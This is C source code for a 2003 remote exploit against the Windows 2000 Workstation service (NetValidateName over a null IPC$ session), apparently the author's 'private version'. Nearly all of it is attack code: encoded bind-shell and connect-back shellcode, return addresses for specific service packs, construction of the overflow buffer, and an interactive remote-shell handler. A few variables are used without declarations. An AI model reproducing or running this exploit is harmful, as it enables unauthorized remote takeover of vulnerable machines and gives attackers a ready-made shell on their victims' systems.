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- /*
- * Author: snooq
- * Date: 14 November 2003
- *
- * +++++++++++++ THIS IS A PRIVATE VERSION +++++++++++++++
- *
- * This is just slightly better than the one I posted to
- * packetstorm....
- *
- * The public version will crash 'services.exe' immediately
- * while this one crash it only when u exit from shell....
- *
- * I'm still trying to figure out a way to avoid the 'crash'
- * all together... any ideas????
- *
- * Let me know if you hav trouble compiling this shit...
- * I hope this could be a good e.g for u to try Win32
- * exploitation..
- *
- * This code is crappy... if u know of a better way of doing
- * things... pls tell me.......
- *
- * Otherwise, if you guys r keen... I'll be more than happy
- * to go thru this in details wif u all... Meanwhile..enjoy!
- *
- * +++++++++++++++++++++++++++++++++++++++++++++++++
- */
- #pragma comment (linker,"/NODEFAULTLIB:msvcprtd.lib")
- #pragma comment (linker,"/NODEFAULTLIB:libcmtd.lib")
- #pragma comment (linker,"/NODEFAULTLIB:libcmt.lib")
- #pragma comment (linker,"/NODEFAULTLIB:libcd.lib")
- #pragma comment (lib,"ws2_32")
- #pragma comment (lib,"msvcrt")
- #pragma comment (lib,"mpr")
- #pragma warning (disable:4013)
- #include <winsock2.h>
- #include <windows.h>
- #include <process.h>
- #include <stdlib.h>
- #include <stdio.h>
- #include <lm.h>
- #define NOP 0x90
- #define PORT 24876
- #define KEY 0x99999999
- #define ALIGN 1 // Between 0 ~ 3
- #define TARGET 1
- #define INTERVAL 3
- #define TIME_OUT 20
- #define PORT_OFFSET_1 198
- #define PORT_OFFSET_2 193
- #define IP_OFFSET 186
- #define SC_OFFSET 20 // Gap for some NOPs...
- #define RET_SIZE 2026 // Big enuff to take EIP... ;)
- #define SC_SIZE_1 sizeof(bindport)
- #define SC_SIZE_2 sizeof(connback)
- #define BSIZE 2600
- #define SSIZE 128
- extern char getopt(int,char **,char*);
- extern char *optarg;
- static int alarm_fired=0;
- FARPROC fxn;
- HANDLE t1, t2;
- char buff[BSIZE];
- struct {
- char *os;
- long jmpesp;
- char *dll;
- }
- targets[] = {
- {
- "Window 2000 (en) SP4",
- 0x77e14c29,
- "user32.dll 5.0.2195.6688"
- },
- {
- "Window 2000 (en) SP1",
- 0x77e3cb4c,
- "user32.dll 5.0.2195.1600"
- },
- {
- "For debugging only",
- 0x41424344,
- "dummy.dll 5.0.2195.1600"
- }
- }, v;
- /*
- * HD Moore's shellcode..... ;)
- */
- char bindport[]=
- "\xeb\x19\x5e\x31\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x99\x99\x99"
- "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
- "\x71\xa1\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x7c\xd0\x1f"
- "\xd0\x3d\x34\xb7\x70\x3d\x83\xe9\x5e\x40\x90\x6c\x34\x52\x74\x65"
- "\xa2\x17\xd7\x97\x75\xe7\x41\x7b\xea\x34\x40\x9c\x57\xeb\x67\x2a"
- "\x8f\xce\xca\xab\xc6\xaa\xab\xb7\xdd\xd5\xd5\x99\x98\xc2\xcd\x10"
- "\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd\x12\x98\x12\xd9\x95\x12\xe9\x85"
- "\x34\x12\xc1\x91\x72\x95\x14\xce\xb5\xc8\xcb\x66\x49\x10\x5a\xc0"
- "\x72\x89\xf3\x91\xc7\x98\x77\xf3\x93\xc0\x12\xe4\x99\x19\x60\x9f"
- "\xed\x7d\xc8\xca\x66\xad\x16\x71\x09\x99\x99\x99\xc0\x10\x9d\x17"
- "\x7b\x72\xa8\x66\xff\x18\x75\x09\x98\xcd\xf1\x98\x98\x99\x99\x66"
- "\xcc\xb9\xce\xce\xce\xce\xde\xce\xde\xce\x66\xcc\x85\x10\x5a\xa8"
- "\x66\xce\xce\xf1\x9b\x99\xf8\xb5\x10\x7f\xf3\x89\xcf\xca\x66\xcc"
- "\x81\xce\xca\x66\xcc\x8d\xce\xcf\xca\x66\xcc\x89\x10\x5b\xff\x18"
- "\x75\xcd\x99\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x10\x4e\x5f"
- "\xdd\xbd\x89\xdd\x67\xdd\xbd\xa4\x10\xe5\xbd\xd1\x10\xe5\xbd\xd5"
- "\x10\xe5\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0"
- "\xc8\xc8\x66\xec\x99\xc8\x66\xcc\xa9\x10\x78\xf1\x66\x66\x66\x66"
- "\x66\xa8\x66\xcc\xb5\xce\x66\xcc\x95\x66\xcc\xb1\xca\xcc\xcf\xce"
- "\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81"
- "\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65"
- "\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5"
- "\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85"
- "\x98\x72\x12\x9d\x12\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4"
- "\xc2\x5b\x91\x99";
- char connback[]=
- "\xeb\x19\x5e\x31\xc9\x81\xe9\xab\xff\xff\xff\x81\x36\x99\x99\x99"
- "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
- "\x71\xa9\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x75\x60\x33"
- "\xf9\x40\x90\x6c\x34\x52\x74\x65\xa2\x17\xd7\x97\x75\xe7\x41\x7b"
- "\xea\x34\x40\x9c\x57\xeb\x67\x2a\x8f\xce\xca\xab\xc6\xaa\xab\xb7"
- "\xdd\xd5\xd5\x99\x98\xc2\xcd\x10\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd"
- "\x12\x98\x12\xd9\x95\x12\xe9\x85\x34\x12\xc1\x91\x72\x95\x14\xce"
- "\xbd\xc8\xcb\x66\x49\x10\x5a\xc0\x72\x89\xf3\x91\xc7\x98\x77\xf3"
- "\x91\xc0\x12\xe4\x99\x19\x60\x9d\xed\x7d\xc8\xca\x66\xad\x16\x71"
- "\x1a\x99\x99\x99\xc0\x10\x9d\x17\x7b\x72\xa8\x66\xff\x18\x75\x09"
- "\x98\xcd\xf1\x98\x98\x99\x99\x66\xcc\x81\xce\xce\xce\xce\xde\xce"
- "\xde\xce\x66\xcc\x8d\x10\x5a\xa8\x66\xf1\x59\x31\x91\xa0\xf1\x9b"
- "\x99\xf8\xb5\x10\x78\xf3\x89\xc8\xca\x66\xcc\x89\x1c\x59\xec\xdd"
- "\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x5f\xdd\xbd\x89\xdd\x67"
- "\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14"
- "\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0\xc8\xc8\x66\xec\x99"
- "\xc8\x66\xcc\xb1\x10\x78\xf1\x66\x66\x66\x66\x66\xa8\x66\xcc\xbd"
- "\xce\x66\xcc\x95\x66\xcc\xb9\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12"
- "\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81\x12\xc3\xb9\x98\x72"
- "\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65\xa8\x59\x35\xa1\x79"
- "\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12"
- "\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85\x98\x72\x12\x9d\x12"
- "\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4\xc2\x5b\x91\x99\x09";
- void err_exit(char *s) {
- printf("%s\n",s);
- exit(0);
- }
- /*
- * Ripped from TESO code and modifed by ey4s for win32
- * and... lamer quoted it wholesale here..... =p
- */
- void doshell(int sock) {
- int l;
- char buf[512];
- struct timeval time;
- unsigned long ul[2];
- time.tv_sec=1;
- time.tv_usec=0;
- while (1) {
- ul[0]=1;
- ul[1]=sock;
- l=select(0,(fd_set *)&ul,NULL,NULL,&time);
- if(l==1) {
- l=recv(sock,buf,sizeof(buf),0);
- if (l<=0) {
- err_exit("-> Connection closed...\n");
- }
- l=write(1,buf,l);
- if (l<=0) {
- err_exit("-> Connection closed...\n");
- }
- }
- else {
- l=read(0,buf,sizeof(buf));
- if (l<=0) {
- err_exit("-> Connection closed...\n");
- }
- l=send(sock,buf,l,0);
- if (l<=0) {
- err_exit("-> Connection closed...\n");
- }
- }
- }
- }
- void changeip(char *ip) {
- char *ptr;
- ptr=connback+IP_OFFSET;
- /* Assume Little-Endianess.... */
- *((long *)ptr)=inet_addr(ip)^KEY;
- }
- void changeport(char *code, int port, int offset) {
- char *ptr;
- ptr=code+offset;
- port^=KEY;
- /* Assume Little-Endianess.... */
- *ptr++=(char)((port>>8)&0xff);
- *ptr++=(char)(port&0xff);
- }
- void banner() {
- printf("\nWKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]\n\n");
- }
- void usage(char *s) {
- banner();
- printf("Usage: %s [options]\n",s);
- printf("\t-r\tSize of 'return addresses'\n");
- printf("\t-a\tAlignment size [0~3]\n");
- printf("\t-p\tPort to bind shell to (in 'connecting' mode), or\n");
- printf("\t\tPort for shell to connect back (in 'listening' mode)\n");
- printf("\t-s\tShellcode offset from the return address\n");
- printf("\t-h\tTarget's IP\n");
- printf("\t-t\tTarget types. ( -H for more info )\n");
- printf("\t-H\tShow list of possible targets\n");
- printf("\t-l\tListening for shell connecting\n");
- printf("\t\tback to port specified by '-p' switch\n");
- printf("\t-i\tIP for shell to connect back\n");
- printf("\t-I\tTime interval between each trial ('connecting' mode only)\n");
- printf("\t-T\tTime out (in number of seconds)\n\n");
- printf("\tNotes:\n\t======\n\t'-h' is mandatory\n");
- printf("\t'-i' is mandatory if '-l' is specified\n\n");
- exit(0);
- }
- void showtargets() {
- int i;
- banner();
- printf("Possible targets are:\n");
- printf("=====================\n");
- for (i=0;i<sizeof(targets)/sizeof(v);i++) {
- printf("%d) %s",i+1,targets[i].os);
- printf(" --> 0x%08x (%s)\n",targets[i].jmpesp,targets[i].dll);
- }
- exit(0);
- }
- void sendstr(char *host) {
- WCHAR wStr[128];
- char ipc[128], hStr[128];
- DWORD ret;
- hMod=LoadLibrary("netapi32.dll");
- fxn=GetProcAddress(hMod,"NetValidateName");
- _snprintf(ipc,127,"\\\\%s\\ipc$",host);
- _snprintf(hStr,127,"\\\\%s",host);
- MultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0]));
- NET.lpLocalName = NULL;
- NET.lpProvider = NULL;
- NET.lpRemoteName = (char*)&ipc;
- printf("-> Setting up $IPC session...(aka 'null session')\n");
- ret=WNetAddConnection2(&NET,"","",0);
- if (ret!=ERROR_SUCCESS) { err_exit("-> Couldn't establish IPC$ connection..."); }
- else printf("-> IPC$ session setup successfully...\n");
- printf("-> Sending exploit string...\n");
- ret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0);
- }
- VOID CALLBACK alrm_bell(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime ) {
- err_exit("-> I give up...dude.....");
- }
- void setalarm(int timeout) {
- MSG msg = { 0, 0, 0, 0 };
- SetTimer(0, 0, (timeout*1000), (TIMERPROC)alrm_bell);
- while(!alarm_fired) {
- if (GetMessage(&msg, 0, 0, 0) ) {
- if (msg.message == WM_TIMER) printf("-> WM_TIMER received...\n");
- DispatchMessage(&msg);
- }
- }
- }
- void resetalarm() {
- if (TerminateThread(t2,0)==0) {
- err_exit("-> Failed to reset alarm...");
- }
- if (TerminateThread(t1,0)==0) {
- err_exit("-> Failed to kill the 'sending' thread...");
- }
- }
- void do_send(char *host,int timeout) {
- t1=(HANDLE)_beginthread(sendstr,0,host);
- if (t1==0) { err_exit("-> Failed to send exploit string..."); }
- t2=(HANDLE)_beginthread(setalarm,0,timeout);
- if (t2==0) { err_exit("-> Failed to set alarm clock..."); }
- }
- int main(int argc, char *argv[]) {
- char opt;
- char *host, *ptr, *ip="";
- struct sockaddr_in sockadd;
- int i, i_len, ok=0, mode=0, flag=0;
- int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;
- int target=TARGET, scsize=SC_SIZE_1, port=PORT;
- int timeout=TIME_OUT, interval=INTERVAL;
- long retaddr;
- WSADATA wsd;
- SOCKET s1, s2;
- if (argc<2) { usage(argv[0]); }
- while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) {
- switch(opt) {
- case 'a':
- align=atoi(optarg);
- break;
- case 'I':
- interval=atoi(optarg);
- break;
- case 'T':
- timeout=atoi(optarg);
- break;
- case 't':
- target=atoi(optarg);
- retaddr=targets[target-1].jmpesp;
- break;
- case 'i':
- ip=optarg;
- changeip(ip);
- break;
- case 'l':
- mode=1;
- scsize=SC_SIZE_2;
- break;
- case 'r':
- retsize=atoi(optarg);
- break;
- case 's':
- sc_offset=atoi(optarg);
- break;
- case 'h':
- ok=1;
- host=optarg;
- sockadd.sin_addr.s_addr=inet_addr(optarg);
- break;
- case 'p':
- port=atoi(optarg);
- break;
- case 'H':
- showtargets();
- break;
- default:
- usage(argv[0]);
- break;
- }
- }
- if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); }
- memset(buff,NOP,BSIZE);
- ptr=buff+align;
- for(i=0;i<retsize;i+=4) {
- *((long *)ptr)=retaddr;
- ptr+=4;
- }
- if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {
- err_exit("-> WSAStartup error....");
- }
- if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
- err_exit("-> socket() error...");
- }
- sockadd.sin_family=AF_INET;
- sockadd.sin_port=htons((SHORT)port);
- ptr=buff+retsize+sc_offset;
- if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'..");
- banner();
- if (mode) {
- printf("-> 'Listening' mode...( port: %d )\n",port);
- changeport(connback, port, PORT_OFFSET_2);
- for(i=0;i<scsize;i++) { *ptr++=connback[i]; }
- do_send(host,timeout);
- Sleep(1000);
- sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
- i_len=sizeof(sockadd);
- if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {
- err_exit("-> bind() error");
- }
- if (listen(s1,0)<0) {
- err_exit("-> listen() error");
- }
- printf("-> Waiting for connection...\n");
- s2=accept(s1,(struct sockaddr *)&sockadd,&i_len);
- if (s2<0) {
- err_exit("-> accept() error");
- }
- printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr));
- resetalarm();
- doshell(s2);
- }
- else {
- printf("-> 'Connecting' mode...\n",port);
- changeport(bindport, port, PORT_OFFSET_1);
- for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }
- do_send(host,timeout);
- Sleep(1000);
- printf("-> Will try connecting to shell now....\n");
- i=0;
- while(!flag) {
- Sleep(interval*1000);
- if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
- printf("-> Trial #%d....\n",i++);
- }
- else { flag=1; }
- }
- printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port);
- resetalarm();
- doshell(s1);
- }
- return 0;
- }